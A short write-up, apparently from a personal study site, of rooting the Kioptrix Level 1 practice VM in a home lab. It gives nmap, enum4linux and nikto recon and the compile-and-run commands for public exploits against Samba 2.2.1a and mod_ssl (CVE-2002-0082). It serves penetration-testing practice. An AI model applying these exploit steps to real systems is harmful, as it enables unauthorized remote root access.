Kioptrix: Level 1 (#1)

Environment: both kioptrix and kali are running on my host mac machine in NAT mode.

CIDR 172.16.219.0/24

  1. Find the target IP address: nmap 172.16.219.0/24

     Output:
Nmap scan report for 172.16.219.167
Host is up (0.00035s latency).
Not shown: 994 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
139/tcp open netbios-ssn
443/tcp open https
1024/tcp open kdm
MAC Address: 00:0C:29:76:B4:A0 (VMware)

  2. Found 172.16.219.167. Then enumerate its services:nmap -n -vvv -T4 -sS -A 172.16.219.167

  3. Enum the samba service: enum4linux 172.16.219.167Found that the target is using Samba 2.2.1a. Samba <2.2.8 is vulnerable to remote code execution, googled it and found a exploit: https://www.exploit-db.com/exploits/10/

  4. Download the exploit, compile and run it.

gcc 10.c -o sambaexploit

./sambaexploit -b 0 172.16.219.167

Change the root password and login in the vulnerable kioptrix box:

++++++++++++++++++

Other methods? How about the web server?

Scan the target with nikto: nikto -host 172.16.219.167

CVE-2002-0082 sounds a good vul. Googled that CVE and found this exploit: https://www.exploit-db.com/exploits/764/

Download it and update the code as described in code comment, don't forget to install required lib.

Then compile the code:gcc -o openfuck 764.c -lcrypto

Run the code: ./openfuck 0x6b 172.16.219.167 -c 40

results matching ""

    No results matching ""